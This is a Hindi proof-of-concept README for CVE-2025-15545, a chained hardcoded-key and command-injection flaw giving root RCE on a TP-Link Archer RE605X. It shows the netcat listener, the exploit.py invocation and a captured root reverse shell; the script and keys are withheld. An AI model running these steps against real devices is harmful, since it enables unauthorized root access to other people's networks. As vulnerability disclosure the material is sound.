
CVE-2025-15545 के लिए प्रमाण की अवधारणा
विक्रेता: TP-Link
विक्रेता की वेबसाइट: TP-Link
मॉडल: Archer RE605X
हार्डवेयर संस्करण: RE605X v3.0
फर्मवेयर संस्करण: RE605X(EU)_V3_1.1.5 Build 20240905
फर्मवेयर डाउनलोड पता: TP-Link
कठोर-कोडित क्रिप्टोग्राफिक कुंजियों के उपयोग और XML कॉन्फ़िगरेशन पार्सर घटक में एक कमांड इंजेक्शन सहित कमजोरियों की एक श्रृंखला, एक स्थानीय प्रमाणित हमलावर को डिवाइस पर रूट के रूप में रिमोट कोड निष्पादन (RCE) प्राप्त करने की अनुमति देती है।
नोट: exploit.py प्रूफ-ऑफ-कॉन्सेप्ट एक श्रृंखलाबद्ध हमले के परिदृश्य को प्रदर्शित करता है और एक अतिरिक्त पूर्वापेक्षा के रूप में एक प्रमाणित उपयोगकर्ता से क्रेडेंशियल्स पर निर्भर करता है। यह प्रमाणीकरण चरण CVE-2025-15545 द्वारा कवर नहीं किया गया है और केवल प्रदर्शन उद्देश्यों के लिए शामिल किया गया है।
एक अलग टर्मिनल पर आने वाले कनेक्शनों को सुनें:
$ nc -lvnp 4444
exploit.py स्क्रिप्ट को निष्पादित करें:
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>
नोट: aes_key और aes_iv डिवाइस द्वारा कॉन्फ़िगरेशन फ़ाइलों के एन्क्रिप्शन और डिक्रिप्शन के लिए उपयोग की जाने वाली कठोर-कोडित क्रिप्टोग्राफिक कुंजियाँ हैं, और इस प्रूफ-ऑफ-कॉन्सेप्ट के लिए आवश्यक हैं। सुरक्षा कारणों से उन्हें यहाँ साझा नहीं किया जा सकता है।
रिवर्स शेल पहले टर्मिनल पर प्राप्त होता है:
$ nc -lvnp 4444
Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt
ये कमजोरियाँ Nicola Giuffrida द्वारा रिपोर्ट की गईं।